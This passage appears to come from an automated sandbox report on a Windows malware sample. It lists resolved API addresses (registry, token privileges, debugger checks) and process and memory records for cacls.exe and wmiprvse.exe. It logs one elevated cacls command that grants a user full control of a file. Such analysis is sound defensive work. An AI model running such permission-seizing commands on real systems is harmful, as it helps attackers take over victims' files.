| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:09 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #100: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #100 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:31, Reason: Child Process |
| Unmonitor | End Time: 00:04:33, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf5c |
| Parent PID | 0xe4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
424
0x
918
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002d0000 | 0x002d0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00313fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x003d0000 | 0x0048dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x004d0000 | 0x004d1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x006b0000 | 0x009e6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f730000 | 0x7f730000 | 0x7f82ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f830000 | 0x7f830000 | 0x7f852fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f853000 | 0x7f853000 | 0x7f853fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f858000 | 0x7f858000 | 0x7f85afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f85b000 | 0x7f85b000 | 0x7f85dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f85e000 | 0x7f85e000 | 0x7f85efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #101: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #101 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\Windows\system32\wbem\wmiprvse.exe -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:32, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:29 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x998 |
| Parent PID | 0x240 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
A68
0x
2F4
0x
B6C
0x
ADC
0x
BF8
0x
2C4
0x
E88
0x
F48
0x
E80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000006494370000 | 0x6494370000 | 0x649438ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006494370000 | 0x6494370000 | 0x649437ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000006494380000 | 0x6494380000 | 0x6494386fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006494390000 | 0x6494390000 | 0x64943a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000064943b0000 | 0x64943b0000 | 0x649442ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006494430000 | 0x6494430000 | 0x6494433fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000006494440000 | 0x6494440000 | 0x6494440fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006494450000 | 0x6494450000 | 0x6494451fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x6494460000 | 0x649451dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006494520000 | 0x6494520000 | 0x6494526fff | Private Memory | rw |
|
|
|
- |
| private_0x0000006494530000 | 0x6494530000 | 0x6494530fff | Private Memory | rw |
|
|
|
- |
| private_0x0000006494540000 | 0x6494540000 | 0x6494540fff | Private Memory | rw |
|
|
|
- |
| user32.dll.mui | 0x6494550000 | 0x6494554fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000006494560000 | 0x6494560000 | 0x6494560fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000006494570000 | 0x6494570000 | 0x6494570fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000006494580000 | 0x6494580000 | 0x6494580fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006494590000 | 0x6494590000 | 0x649468ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006494690000 | 0x6494690000 | 0x649470ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006494710000 | 0x6494710000 | 0x649478ffff | Private Memory | rw |
|
|
|
- |
| mssmbios.sys | 0x6494710000 | 0x649471afff | Memory Mapped File | rw |
|
|
|
- |
| hdaudbus.sys | 0x6494710000 | 0x6494723fff | Memory Mapped File | rw |
|
|
|
- |
| portcls.sys | 0x6494710000 | 0x649475efff | Memory Mapped File | rw |
|
|
|
- |
| monitor.sys | 0x6494710000 | 0x6494719fff | Memory Mapped File | rw |
|
|
|
- |
| ndis.sys.mui | 0x6494710000 | 0x649471ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006494780000 | 0x6494780000 | 0x649478ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x6494790000 | 0x6494ac6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000006494ad0000 | 0x6494ad0000 | 0x6494c57fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000006494c60000 | 0x6494c60000 | 0x6494de0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000006494df0000 | 0x6494df0000 | 0x6494eaffff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x6494eb0000 | 0x6494f85fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006494eb0000 | 0x6494eb0000 | 0x6494f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006494f30000 | 0x6494f30000 | 0x649502ffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x6495030000 | 0x6495170fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006495030000 | 0x6495030000 | 0x64950affff | Private Memory | rw |
|
|
|
- |
| private_0x00000064950b0000 | 0x64950b0000 | 0x649512ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006495130000 | 0x6495130000 | 0x64951affff | Private Memory | rw |
|
|
|
- |
| private_0x00000064951b0000 | 0x64951b0000 | 0x649522ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006495230000 | 0x6495230000 | 0x64952affff | Private Memory | rw |
|
|
|
- |
| private_0x00000064952b0000 | 0x64952b0000 | 0x649532ffff | Private Memory | rw |
|
|
|
- |
| advapi32.dll | 0x6495330000 | 0x64953d2fff | Memory Mapped File | rw |
|
|
|
- |
| acpi.sys | 0x6495330000 | 0x64953b9fff | Memory Mapped File | rw |
|
|
|
- |
| ndis.sys | 0x6495330000 | 0x649544dfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00007df5ff120000 | 0x7df5ff120000 | 0x7ff5ff11ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff702338000 | 0x7ff702338000 | 0x7ff702339fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70233a000 | 0x7ff70233a000 | 0x7ff70233bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70233c000 | 0x7ff70233c000 | 0x7ff70233dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70233e000 | 0x7ff70233e000 | 0x7ff70233ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff702340000 | 0x7ff702340000 | 0x7ff70243ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff702440000 | 0x7ff702440000 | 0x7ff702462fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff702464000 | 0x7ff702464000 | 0x7ff702465fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff702466000 | 0x7ff702466000 | 0x7ff702467fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff702468000 | 0x7ff702468000 | 0x7ff702469fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70246a000 | 0x7ff70246a000 | 0x7ff70246bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70246c000 | 0x7ff70246c000 | 0x7ff70246dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff70246e000 | 0x7ff70246e000 | 0x7ff70246efff | Private Memory | rw |
|
|
|
- |
| wmiprvse.exe | 0x7ff702dc0000 | 0x7ff702e3efff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7ffae92d0000 | 0x7ffae92e5fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7ffae9440000 | 0x7ffae9464fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ffae9470000 | 0x7ffae9483fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ffae9490000 | 0x7ffae9587fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ffae9fa0000 | 0x7ffae9fb0fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprov.dll | 0x7ffaed1a0000 | 0x7ffaed1dcfff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ffaef560000 | 0x7ffaef5defff | Memory Mapped File | rwx |
|
|
|
- |
| wmiclnt.dll | 0x7ffaf1420000 | 0x7ffaf1430fff | Memory Mapped File | rwx |
|
|
|
- |
